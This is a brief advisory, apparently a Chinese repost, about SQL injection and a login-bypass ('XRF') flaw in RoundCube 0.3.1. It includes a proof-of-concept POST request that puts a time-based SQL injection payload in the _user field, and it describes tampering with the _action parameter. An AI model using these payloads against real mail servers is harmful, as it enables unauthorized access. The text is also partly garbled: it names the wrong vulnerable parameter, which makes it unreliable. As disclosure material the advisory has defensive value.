标题: RoundCube 0.3.1 SQL injection
作者: Smith Falcon HdhCmsTest2cto测试数据
下载 地址: http://roundcube.net/download
版本: 0.3.1
测试平台: Linux
_timezone=
is vulnerable to SQL Union Injection.
"POST" data in
http://HdhCmsTest2cto测试数据 /roundcube/index.php
_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2C MD5 (1))+or+'1'='1"
XRF缺陷[ POC ]
POST variable
changing variable _action=login to "_action=anything" shows you the site is
vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
attacks. Successful tampering will lead to username compromising.
_action=loggedin
Credits - iqZer0
查看更多关于RoundCube 0.3.1 XRF/SQL注射缺陷及修复 - 网站安全 -的详细内容...